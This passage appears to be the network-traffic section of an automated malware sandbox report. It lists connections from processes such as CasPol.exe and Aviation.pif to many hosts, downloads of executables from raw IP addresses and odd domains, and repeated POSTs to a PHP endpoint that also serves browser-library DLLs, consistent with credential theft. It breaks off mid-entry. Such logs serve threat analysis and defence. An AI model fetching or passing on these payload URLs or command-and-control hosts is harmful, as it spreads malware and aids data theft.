                                                                                                                                                                                                                                                                  GET https://bbuseruploads.s3.amazonaws.com/c238a61a-be46-44a2-84f2-dcbe608a006a/downloads/0c322e92-7ded-485f-8f7e-dcd768dac239/FlexPremises.exe?response-content-disposition=attachment%3B%20filename%3D%22FlexPremises.exe%22&AWSAccessKeyId=ASIA6KOSE3BNO4RKJTEI&Signature=fP4AUrYtuepo7A%2FvRAOkJQsOtrI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEOf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIDvhb6af67Krb7onSxljk0Aqra6ZXY41NU7th6kbhYRSAiEAmDF2SaO3kfBTtVPdXCHBPAq5lTpehQGYTB0J4l%2BA1xsqpwIIUBAAGgw5ODQ1MjUxMDExNDYiDFv9xPFrxdM19ack8yqEAhFcojSQlOF%2FVJvzcxdJBT7ZCnvBG9GNIq3q59d%2FB3xm5oyAnYumlVJ%2BOQHKR49A1ycXhIQBwCz52pGycgJ7p66AD9657Zj67Uz%2F6%2F9ZsqN%2B1hZdZUbSxQBuuJ7smHL0yswNqQfdCEQSwTMACfjmMtN1KE8%2Fo6IDu5D025IaIGF1basMzaL5xVWKk%2B%2FBl9IEeCLnwxIYxToHn7AMMhrrkblHwXlWwPbizegLza%2Fd4fla6TybOoTYPsvM5sHcePV%2Fu3Bc20oOYQQMnlinO6r18KOLi5ml4rZhhHiIQ3scew%2FHwbSJQJxS97n2Ert%2FUabD6vZSrug9Vz%2Fyr939%2B7JOksKXnw4WMKLh%2F7EGOp0BVIiB57FBNYWmI79hCIqoFho13KaTQm1SrlHd75jbvQY674dZYOj4%2BseJH0Bht3MvbcdE9W4ArD06tLMX8ttWLr5x4zfNzVJBexdZFqvHbO6tKkF8hWHbdb91QPThvlpnmfJhIHRLwfza6BvjDwVVZXbvXAjvuHhUoeGshdv8tTE6U5uD7zZP8M8dFbI%2FqVJveNoiSqAqGw5lfMDI0Q%3D%3D&Expires=1715468202

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 104.21.48.123:443
                                                                                                                                                                                                                                                                  appetitesallooonsj.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 104.21.3.125:443
                                                                                                                                                                                                                                                                  minorittyeffeoos.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.4kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  11
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                • 104.21.92.157:443
                                                                                                                                                                                                                                                                  prideconstituiiosjk.shop
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  RegAsm.exe
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  6.9kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 104.68.92.92:443
                                                                                                                                                                                                                                                                  steamcommunity.com
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  2.3kB
                                                                                                                                                                                                                                                                  42.7kB
                                                                                                                                                                                                                                                                  39
                                                                                                                                                                                                                                                                  36
                                                                                                                                                                                                                                                                • 65.109.242.112:443
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  1.1kB
                                                                                                                                                                                                                                                                  2.7kB
                                                                                                                                                                                                                                                                  11
                                                                                                                                                                                                                                                                  8

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://65.109.242.112/

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 65.109.242.112:443
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  1.4kB
                                                                                                                                                                                                                                                                  622 B
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                  6

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST https://65.109.242.112/

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 65.109.242.112:443
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  1.5kB
                                                                                                                                                                                                                                                                  2.2kB
                                                                                                                                                                                                                                                                  10
                                                                                                                                                                                                                                                                  8

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST https://65.109.242.112/

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 65.109.242.112:443
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  1.6kB
                                                                                                                                                                                                                                                                  6.3kB
                                                                                                                                                                                                                                                                  12
                                                                                                                                                                                                                                                                  9

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST https://65.109.242.112/

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 65.109.242.112:443
                                                                                                                                                                                                                                                                  https://65.109.242.112/
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  Aviation.pif
                                                                                                                                                                                                                                                                  1.4kB
                                                                                                                                                                                                                                                                  632 B
                                                                                                                                                                                                                                                                  8
                                                                                                                                                                                                                                                                  5

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST https://65.109.242.112/

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  399 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 77.221.151.47:9090
                                                                                                                                                                                                                                                                  GameSyncLinks.exe
                                                                                                                                                                                                                                                                  2.3kB
                                                                                                                                                                                                                                                                  308 B
                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                • 127.0.0.1:14343
                                                                                                                                                                                                                                                                  GameSyncLinks.exe
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 104.20.3.235:443
                                                                                                                                                                                                                                                                  https://pastebin.com/raw/E0rY26ni
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  724 B
                                                                                                                                                                                                                                                                  6.1kB
                                                                                                                                                                                                                                                                  8
                                                                                                                                                                                                                                                                  9

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://pastebin.com/raw/E0rY26ni

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 172.67.169.89:443
                                                                                                                                                                                                                                                                  https://yip.su/RNWPd.exe
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  939 B
                                                                                                                                                                                                                                                                  14.3kB
                                                                                                                                                                                                                                                                  13
                                                                                                                                                                                                                                                                  20

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://yip.su/RNWPd.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 185.172.128.59:80
                                                                                                                                                                                                                                                                  http://185.172.128.59/ISetup5.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  12.1kB
                                                                                                                                                                                                                                                                  408.4kB
                                                                                                                                                                                                                                                                  237
                                                                                                                                                                                                                                                                  308

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.59/ISetup5.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 5.42.96.64:80
                                                                                                                                                                                                                                                                  http://5.42.96.64/server/ww12/AppGate2103v01.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  28.5kB
                                                                                                                                                                                                                                                                  1.5MB
                                                                                                                                                                                                                                                                  599
                                                                                                                                                                                                                                                                  1071

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.64/server/ww12/AppGate2103v01.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 5.42.96.78:80
                                                                                                                                                                                                                                                                  http://5.42.96.78/files/setup.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  118.5kB
                                                                                                                                                                                                                                                                  6.7MB
                                                                                                                                                                                                                                                                  2542
                                                                                                                                                                                                                                                                  4839

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.78/files/setup.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 172.67.182.192:443
                                                                                                                                                                                                                                                                  https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  756 B
                                                                                                                                                                                                                                                                  6.1kB
                                                                                                                                                                                                                                                                  8
                                                                                                                                                                                                                                                                  9

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  307
                                                                                                                                                                                                                                                                • 104.21.90.14:443
                                                                                                                                                                                                                                                                  https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  752 B
                                                                                                                                                                                                                                                                  6.1kB
                                                                                                                                                                                                                                                                  8
                                                                                                                                                                                                                                                                  9

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  307
                                                                                                                                                                                                                                                                • 172.67.182.192:443
                                                                                                                                                                                                                                                                  https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  756 B
                                                                                                                                                                                                                                                                  6.1kB
                                                                                                                                                                                                                                                                  8
                                                                                                                                                                                                                                                                  9

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  307
                                                                                                                                                                                                                                                                • 5.42.96.78:80
                                                                                                                                                                                                                                                                  http://5.42.96.78/files/setup.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  126.6kB
                                                                                                                                                                                                                                                                  6.7MB
                                                                                                                                                                                                                                                                  2663
                                                                                                                                                                                                                                                                  4851

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.96.78/files/setup.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 185.18.245.58:80
                                                                                                                                                                                                                                                                  http://1xst.ru/tech/upd2.php
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  300 B
                                                                                                                                                                                                                                                                  132 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  3

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://1xst.ru/tech/upd2.php
                                                                                                                                                                                                                                                                • 104.21.90.14:443
                                                                                                                                                                                                                                                                  https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  752 B
                                                                                                                                                                                                                                                                  6.1kB
                                                                                                                                                                                                                                                                  8
                                                                                                                                                                                                                                                                  9

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  307
                                                                                                                                                                                                                                                                • 104.21.31.124:443
                                                                                                                                                                                                                                                                  https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  112.8kB
                                                                                                                                                                                                                                                                  4.5MB
                                                                                                                                                                                                                                                                  2093
                                                                                                                                                                                                                                                                  3220

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 104.21.31.124:443
                                                                                                                                                                                                                                                                  https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  116.9kB
                                                                                                                                                                                                                                                                  4.5MB
                                                                                                                                                                                                                                                                  2130
                                                                                                                                                                                                                                                                  3225

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://jonathantwo.com/c1c0442216217cdebb073c3e11f975df/6779d89b7a368f4f3f340b50a9d18d71.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 104.21.60.76:443
                                                                                                                                                                                                                                                                  https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  114.4kB
                                                                                                                                                                                                                                                                  4.5MB
                                                                                                                                                                                                                                                                  2133
                                                                                                                                                                                                                                                                  3231

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 104.21.60.76:443
                                                                                                                                                                                                                                                                  https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe
                                                                                                                                                                                                                                                                  tls, http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  115.4kB
                                                                                                                                                                                                                                                                  4.5MB
                                                                                                                                                                                                                                                                  2137
                                                                                                                                                                                                                                                                  3219

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET https://firstfirecar.com/c1c0442216217cdebb073c3e11f975df/baf14778c246e15550645e30ba78ce1c.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 185.18.245.58:80
                                                                                                                                                                                                                                                                  http://1xst.ru/tech/upd2.php
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  CasPol.exe
                                                                                                                                                                                                                                                                  352 B
                                                                                                                                                                                                                                                                  132 B
                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                  3

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://1xst.ru/tech/upd2.php
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 5.42.66.10:80
                                                                                                                                                                                                                                                                  http://5.42.66.10/api/bing_release.php
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  YPvckKCypmBOW0NpRBKcRmjU.exe
                                                                                                                                                                                                                                                                  481 B
                                                                                                                                                                                                                                                                  433 B
                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                  4

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://5.42.66.10/api/bing_release.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 104.26.9.59:443
                                                                                                                                                                                                                                                                  api.myip.com
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  YPvckKCypmBOW0NpRBKcRmjU.exe
                                                                                                                                                                                                                                                                  913 B
                                                                                                                                                                                                                                                                  6.3kB
                                                                                                                                                                                                                                                                  8
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 34.117.186.192:443
                                                                                                                                                                                                                                                                  ipinfo.io
                                                                                                                                                                                                                                                                  tls
                                                                                                                                                                                                                                                                  YPvckKCypmBOW0NpRBKcRmjU.exe
                                                                                                                                                                                                                                                                  962 B
                                                                                                                                                                                                                                                                  5.6kB
                                                                                                                                                                                                                                                                  8
                                                                                                                                                                                                                                                                  9
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 185.172.128.90:80
                                                                                                                                                                                                                                                                  http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
                                                                                                                                                                                                                                                                  435 B
                                                                                                                                                                                                                                                                  357 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  4

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  500
                                                                                                                                                                                                                                                                • 185.172.128.228:80
                                                                                                                                                                                                                                                                  http://185.172.128.228/ping.php?substr=five
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
                                                                                                                                                                                                                                                                  375 B
                                                                                                                                                                                                                                                                  279 B
                                                                                                                                                                                                                                                                  4
                                                                                                                                                                                                                                                                  3

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.228/ping.php?substr=five

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 185.172.128.59:80
                                                                                                                                                                                                                                                                  http://185.172.128.59/syncUpd.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
                                                                                                                                                                                                                                                                  4.8kB
                                                                                                                                                                                                                                                                  259.0kB
                                                                                                                                                                                                                                                                  101
                                                                                                                                                                                                                                                                  196

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.59/syncUpd.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 185.172.128.228:80
                                                                                                                                                                                                                                                                  http://185.172.128.228/BroomSetup.exe
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  dH6oPXkyyyDL7hNf3xeAvCZ9.exe
                                                                                                                                                                                                                                                                  100.3kB
                                                                                                                                                                                                                                                                  5.0MB
                                                                                                                                                                                                                                                                  2104
                                                                                                                                                                                                                                                                  3746

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.228/BroomSetup.exe

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 77.221.151.47:8080
                                                                                                                                                                                                                                                                  PiercingNetLink.exe
                                                                                                                                                                                                                                                                  353 B
                                                                                                                                                                                                                                                                  268 B
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                  5
                                                                                                                                                                                                                                                                • 20.157.87.45:80
                                                                                                                                                                                                                                                                  http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  u2rs.1.exe
                                                                                                                                                                                                                                                                  836 B
                                                                                                                                                                                                                                                                  721 B
                                                                                                                                                                                                                                                                  6
                                                                                                                                                                                                                                                                  6

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashx

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200
                                                                                                                                                                                                                                                                • 185.172.128.150:80
                                                                                                                                                                                                                                                                  http://185.172.128.150/c698e1bc8a2f5e6d.php
                                                                                                                                                                                                                                                                  http
                                                                                                                                                                                                                                                                  u2rs.0.exe
                                                                                                                                                                                                                                                                  1.0MB
                                                                                                                                                                                                                                                                  5.4MB
                                                                                                                                                                                                                                                                  4688
                                                                                                                                                                                                                                                                  4346

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  GET http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

                                                                                                                                                                                                                                                                  POST http://185.172.128.150/c698e1bc8a2f5e6d.php

                                                                                                                                                                                                                                                                  HTTP Response

                                                                                                                                                                                                                                                                  200

                                                                                                                                                                                                                                                                  HTTP Request

